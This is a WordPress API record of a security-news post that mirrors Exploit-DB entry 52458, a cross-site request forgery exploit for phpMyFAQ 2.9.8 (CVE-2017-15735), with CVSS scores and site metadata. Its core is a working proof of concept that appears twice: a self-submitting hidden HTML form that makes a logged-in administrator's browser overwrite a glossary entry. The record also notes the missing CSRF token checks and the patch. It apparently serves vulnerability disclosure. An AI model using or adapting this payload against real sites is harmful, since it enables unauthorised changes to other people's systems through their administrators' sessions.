{"id":28482,"date":"2025-12-03T13:47:29","date_gmt":"2025-12-03T13:47:29","guid":{"rendered":"http:\/\/localhost\/?p=28482"},"modified":"2025-12-03T13:47:29","modified_gmt":"2025-12-03T13:47:29","slug":"phpmyfaq-298-cross-site-request-forgery-csrf","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=28482","title":{"rendered":"phpMyFAQ 2.9.8 – Cross-Site Request Forgery (CSRF)_EDB-ID:52458"},"content":{"rendered":"

{“lastseen”:”2025-12-03T18:46:49″,”description”:”Exploit Title: phpMyFAQ 2.9.8 Cross-Site Request Forgery CSRF Date: 2024-10-26 Exploit Author: CodeSecLab Vendor Homepage: https:\/\/github.com\/thorsten\/phpMyFAQ Software Link: https:\/\/github.com\/thorsten\/phpMyFAQ Version: 2.9.8 Tested on: Ubuntu Windows…”,”published”:”2025-12-03T00:00:00″,”modified”:”2025-12-03T00:00:00″,”type”:”exploitdb”,”title”:”phpMyFAQ 2.9.8 – Cross-Site Request Forgery (CSRF)”,”source”:””,”references”:””,”id”:”EDB-ID:52458″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2017-15735″],”sourceData”:”# Exploit Title: phpMyFAQ 2.9.8 Cross-Site Request Forgery (CSRF)\\r\\n# Date: 2024-10-26\\r\\n# Exploit Author: CodeSecLab\\r\\n# Vendor Homepage: https:\/\/github.com\/thorsten\/phpMyFAQ\\r\\n# Software Link: https:\/\/github.com\/thorsten\/phpMyFAQ\\r\\n# Version: 2.9.8 \\r\\n# Tested on: Ubuntu Windows\\r\\n# CVE : CVE-2017-15735\\r\\n\\r\\nPoC: \\r\\nWhile still logged in, open another browser window: \\r\\n\\u003chtml\\u003e\\r\\n \\u003cbody\\u003e\\r\\n \\u003cform action=\\”http:\/\/phpmyfaq\/admin\/index.php?action=updateglossary\\” method=\\”POST\\”\\u003e\\r\\n \\u003cinput type=\\”hidden\\” name=\\”id\\” value=\\”1\\”\\u003e\\r\\n \\u003cinput type=\\”hidden\\” name=\\”item\\” value=\\”Malicious Glossary Item\\”\\u003e\\r\\n \\u003cinput type=\\”hidden\\” name=\\”definition\\” value=\\”This is a malicious definition.\\”\\u003e\\r\\n \\u003cinput type=\\”submit\\” value=\\”Submit request\\”\\u003e\\r\\n \\u003c\/form\\u003e\\r\\n \\u003cscript\\u003e\\r\\n document.forms[0].submit();\\r\\n \\u003c\/script\\u003e\\r\\n \\u003c\/body\\u003e\\r\\n\\u003c\/html\\u003e\\r\\n\\r\\nSome Details:\\r\\n{\\r\\n \\”Protection Mechanisms Before Patch\\”: \\”There was no CSRF token validation in place for the glossary modification actions (add, update, delete). The patch introduced CSRF token checks for both POST and GET requests to ensure that only authorized sessions could perform these actions.\\”,\\r\\n \\”File Navigation Chain\\”: \\”Public Access Entry URL -\\u003e phpmyfaq\/admin\/index.php -\\u003e glossary.main.php -\\u003e glossary.edit.php\\”,\\r\\n \\”Execution Path Constraints\\”: \\”The user must be authenticated with the necessary permissions (‘editglossary’) to reach and interact with the glossary functionality through the ‘index.php’ entry point. Without proper authentication, the server redirects to the login form.\\”,\\r\\n \\”Request Parameters\\”: \\”id, item, definition\\”,\\r\\n \\”Request Method\\”: \\”POST\\”,\\r\\n \\”Request URL\\”: \\”http:\/\/phpmyfaq\/admin\/index.php?action=updateglossary\\”,\\r\\n \\”Final PoC\\”: \\”“`\\\\n\\u003chtml\\u003e\\\\n \\u003cbody\\u003e\\\\n \\u003cform action=\\\\\\”http:\/\/phpmyfaq\/admin\/index.php?action=updateglossary\\\\\\” method=\\\\\\”POST\\\\\\”\\u003e\\\\n \\u003cinput type=\\\\\\”hidden\\\\\\” name=\\\\\\”id\\\\\\” value=\\\\\\”1\\\\\\”\\u003e\\\\n \\u003cinput type=\\\\\\”hidden\\\\\\” name=\\\\\\”item\\\\\\” value=\\\\\\”Malicious Glossary Item\\\\\\”\\u003e\\\\n \\u003cinput type=\\\\\\”hidden\\\\\\” name=\\\\\\”definition\\\\\\” value=\\\\\\”This is a malicious definition.\\\\\\”\\u003e\\\\n \\u003cinput type=\\\\\\”submit\\\\\\” value=\\\\\\”Submit request\\\\\\”\\u003e\\\\n \\u003c\/form\\u003e\\\\n \\u003cscript\\u003edocument.forms[0].submit();\\u003c\/script\\u003e\\\\n \\u003c\/body\\u003e\\\\n\\u003c\/html\\u003e\\\\n“`\\”\\r\\n}\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n[Replace Your Domain Name]”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52458″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:H\/A:H”,”version”:”3.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:H\/A:H”,”baseScore”:8.8,”baseSeverity”:”HIGH”,”attackVector”:”NETWORK”,”attackComplexity”:”LOW”,”privilegesRequired”:”NONE”,”userInteraction”:”REQUIRED”,”scope”:”UNCHANGED”,”confidentialityImpact”:”HIGH”,”integrityImpact”:”HIGH”,”availabilityImpact”:”HIGH”}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52458″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-03T18:46:49″,”description”:”Exploit Title: phpMyFAQ 2.9.8 Cross-Site Request Forgery CSRF Date: 2024-10-26 Exploit Author: CodeSecLab Vendor Homepage: https:\/\/github.com\/thorsten\/phpMyFAQ Software Link: https:\/\/github.com\/thorsten\/phpMyFAQ Version: 2.9.8 Tested on: Ubuntu Windows…”,”published”:”2025-12-03T00:00:00″,”modified”:”2025-12-03T00:00:00″,”type”:”exploitdb”,”title”:”phpMyFAQ…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,40,15,13,7,11,5],"class_list":["post-28482","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nphpMyFAQ 2.9.8 - Cross-Site Request Forgery (CSRF)_EDB-ID:52458 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=28482\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"phpMyFAQ 2.9.8 - Cross-Site Request Forgery (CSRF)_EDB-ID:52458 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-03T18:46:49″,”description”:”Exploit Title: phpMyFAQ 2.9.8 Cross-Site Request Forgery CSRF Date: 2024-10-26 Exploit Author: CodeSecLab Vendor Homepage: https:\/\/github.com\/thorsten\/phpMyFAQ Software Link: https:\/\/github.com\/thorsten\/phpMyFAQ Version: 2.9.8 Tested on: Ubuntu Windows…”,”published”:”2025-12-03T00:00:00″,”modified”:”2025-12-03T00:00:00″,”type”:”exploitdb”,”title”:”phpMyFAQ...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=28482\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-03T13:47:29+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28482#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28482\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"phpMyFAQ 2.9.8 – Cross-Site Request Forgery (CSRF)_EDB-ID:52458\",\"datePublished\":\"2025-12-03T13:47:29+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28482\"},\"wordCount\":627,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.8\",\"exploit\",\"exploitdb\",\"HIGH\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28482#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28482\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28482\",\"name\":\"phpMyFAQ 2.9.8 - Cross-Site Request Forgery (CSRF)_EDB-ID:52458 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-03T13:47:29+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28482#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28482\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28482#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"phpMyFAQ 2.9.8 – Cross-Site Request Forgery (CSRF)_EDB-ID:52458\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"phpMyFAQ 2.9.8 - Cross-Site Request Forgery (CSRF)_EDB-ID:52458 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=28482","og_locale":"en_US","og_type":"article","og_title":"phpMyFAQ 2.9.8 - Cross-Site Request Forgery (CSRF)_EDB-ID:52458 - zero redgem","og_description":"{“lastseen”:”2025-12-03T18:46:49″,”description”:”Exploit Title: phpMyFAQ 2.9.8 Cross-Site Request Forgery CSRF Date: 2024-10-26 Exploit Author: CodeSecLab Vendor Homepage: https:\/\/github.com\/thorsten\/phpMyFAQ Software Link: https:\/\/github.com\/thorsten\/phpMyFAQ Version: 2.9.8 Tested on: Ubuntu Windows…”,”published”:”2025-12-03T00:00:00″,”modified”:”2025-12-03T00:00:00″,”type”:”exploitdb”,”title”:”phpMyFAQ...","og_url":"https:\/\/zero.redgem.net\/?p=28482","og_site_name":"zero redgem","article_published_time":"2025-12-03T13:47:29+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=28482#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=28482"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"phpMyFAQ 2.9.8 – Cross-Site Request Forgery (CSRF)_EDB-ID:52458","datePublished":"2025-12-03T13:47:29+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=28482"},"wordCount":627,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.8","exploit","exploitdb","HIGH","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=28482#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=28482","url":"https:\/\/zero.redgem.net\/?p=28482","name":"phpMyFAQ 2.9.8 - Cross-Site Request Forgery (CSRF)_EDB-ID:52458 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-03T13:47:29+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=28482#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=28482"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=28482#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"phpMyFAQ 2.9.8 – Cross-Site Request Forgery (CSRF)_EDB-ID:52458"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28482","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=28482"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28482\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=28482"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=28482"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=28482"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}